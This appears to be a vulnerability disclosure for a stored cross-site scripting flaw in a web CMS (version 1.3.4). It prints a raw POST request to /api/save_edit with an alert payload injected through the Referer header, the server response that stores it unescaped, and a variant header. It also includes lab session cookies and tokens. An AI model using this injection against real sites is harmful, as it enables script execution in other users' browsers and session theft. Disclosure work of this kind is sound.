Description

A stored XSS with alert on Editing page.
I clone repo from master branch and build with docker. Footer show: Version: 1.3.4

Proof of Concept

Request image

Request raw:

POST /api/save_edit HTTP/1.1
Host: 192.168.125.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 2818
Origin: http://192.168.125.131
Connection: close
Referer: http://192.168.125.131/apin0abo'-alert(1)-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1
Cookie: memos_session=MTY3OTkxODY4MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFBZz09fPBd6-5P1k3WJKsaxErdPjFPp6_OkTFmibrRXU0E3jlz; laravel_session=1MLKTpLjLEnXntYlC7Kw07pxYCLz07o4gAQOjbAJ; XSRF-TOKEN=eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CMahzlzZOpS3Y7m6i4lxf5eXVsT2AnzPdq7QstBMlgP6wi0j7xF1htq8P64nT%7C%242y%2410%247pQV%2FPF1ZAtlOQwyplLOYeiS9NPByLu64prJf.h%2FWC8W9zW8Rx7s.; back_to_admin=http%3A//192.168.125.131/admin/view%3Asettings%23option_group%3Dwebsite; mw-back-to-live-edit=true; show-sidebar-layouts=0

data_base64=eyJmaWVsZF9kYXRhXzAiOnsiYXR0cmlidXRlcyI6eyJjbGFzcyI6ImVkaXQgbWFpbi1jb250ZW50IiwicmVsIjoiY29udGVudCIsImZpZWxkIjoiY29udGVudCJ9LCJodG1sIjoiXG4gICAgPGRpdiBjbGFzcz1cIm1vZHVsZSBtb2R1bGUtbGF5b3V0c1wiIGlkPVwibW9kdWxlLWxheW91dHMtMjZcIiBkYXRhLW13LXRpdGxlPVwiTGF5b3V0c1wiIHRlbXBsYXRlPVwic2tpbi0xXCIgZGF0YS10eXBlPVwibGF5b3V0c1wiIHBhcmVudC1tb2R1bGU9XCJsYXlvdXRzXCIgcGFyZW50LW1vZHVsZS1pZD1cIm1vZHVsZS1sYXlvdXRzLTI2XCI%2BXG5cbjxzZWN0aW9uIGNsYXNzPVwic2VjdGlvbiBwLXQtMTAwIHAtYi0xMDAgbm9kcm9wIGNsZWFuLWNvbnRhaW5lciBlZGl0IGNoYW5nZWRcIiBmaWVsZD1cImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjZcIiByZWw9XCJtb2R1bGVcIj5cbiAgICA8ZGl2IGNsYXNzPVwiY29udGFpbmVyXCI%2BXG4gICAgICAgIDxkaXYgY2xhc3M9XCJyb3dcIj5cbiAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJjb2wtMTIgY29sLW1kLTEyIGFsbG93LWRyb3AgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzUyXCI%2BXG4gICAgICAgICAgICAgICAgPGRpdiBjbGFzcz1cIm13LXJvd1wiIHN0eWxlPVwiaGVpZ2h0OiBhdXRvO1wiIGlkPVwiZWxlbWVudF9yb3dfMTY4MDEwNTUxNjc1NlwiPlxuICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctY29sXCIgc3R5bGU9XCJ3aWR0aDogMTAwJTsgaGVpZ2h0OiBhdXRvO1wiPlxuICAgICAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz1cIm13LWVtcHR5LWVsZW1lbnQgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzU0XCIgc3R5bGU9XCJ2aXNpYmlsaXR5OiB2aXNpYmxlO1wiPjxwIGNsYXNzPVwiZWxlbWVudFwiPjwvcD48L2Rpdj48ZGl2IGNsYXNzPVwibXctY29sLWNvbnRhaW5lciBlbGVtZW50XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgXG4gICAgICAgICAgICAgICAgICAgICAgICA8L3A%2BPC9kaXY%2BXG4gICAgICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgIDwvZGl2PlxuICAgIDwvZGl2PlxuPC9zZWN0aW9uPlxuPC9kaXY%2BXG4ifSwiZmllbGRfZGF0YV8xIjp7ImF0dHJpYnV0ZXMiOnsiY2xhc3MiOiJzZWN0aW9uIHAtdC0xMDAgcC1iLTEwMCBub2Ryb3AgY2xlYW4tY29udGFpbmVyIGVkaXQiLCJmaWVsZCI6ImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjYiLCJyZWwiOiJtb2R1bGUifSwiaHRtbCI6IlxuICAgIDxkaXYgY2xhc3M9XCJjb250YWluZXJcIj5cbiAgICAgICAgPGRpdiBjbGFzcz1cInJvd1wiPlxuICAgICAgICAgICAgPGRpdiBjbGFzcz1cImNvbC0xMiBjb2wtbWQtMTIgYWxsb3ctZHJvcCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTJcIj5cbiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctcm93XCIgc3R5bGU9XCJoZWlnaHQ6IGF1dG87XCIgaWQ9XCJlbGVtZW50X3Jvd18xNjgwMTA1NTE2NzU2XCI%2BXG4gICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJtdy1jb2xcIiBzdHlsZT1cIndpZHRoOiAxMDAlOyBoZWlnaHQ6IGF1dG87XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctZW1wdHktZWxlbWVudCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTRcIiBzdHlsZT1cInZpc2liaWxpdHk6IHZpc2libGU7XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BPC9wPjwvZGl2PjxkaXYgY2xhc3M9XCJtdy1jb2wtY29udGFpbmVyIGVsZW1lbnRcIj48cCBjbGFzcz1cImVsZW1lbnRcIj5cbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBcbiAgICAgICAgICAgICAgICAgICAgICAgIDwvcD48L2Rpdj5cbiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICA8L2Rpdj5cbiAgICAgICAgPC9kaXY%2BXG4gICAgPC9kaXY%2BXG4ifSwiaXNfZHJhZnQiOnRydWV9

Response:

{"new_page_url":"http:\/\/192.168.125.131\/apin0abo'-alert(1)-'rzdwg\/file-manager\/list","0":{"rel_type":"module","rel_id":0,"value":"\n    <div>\n        <div>\n            <div>\n                <div>\n                    <div>\n                        <div><p>&lt;\/p&gt;&lt;\/div&gt;<div><p>\n                            \n                        &lt;\/p&gt;&lt;\/div&gt;\n                    &lt;\/div&gt;\n                &lt;\/div&gt;\n            &lt;\/div&gt;\n        &lt;\/div&gt;\n    &lt;\/div&gt;\n","field":"layout-skin-1-module-layouts-26","is_draft":1,"url":"apin0abo'-alert(1)-'rzdwg\/file-manager\/list"}}

Note:

Edit header:
Referer: http://192.168.125.131/apin0abo'-alert('tuanth1997')-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1

Alert

Video POC 1
Video POC 2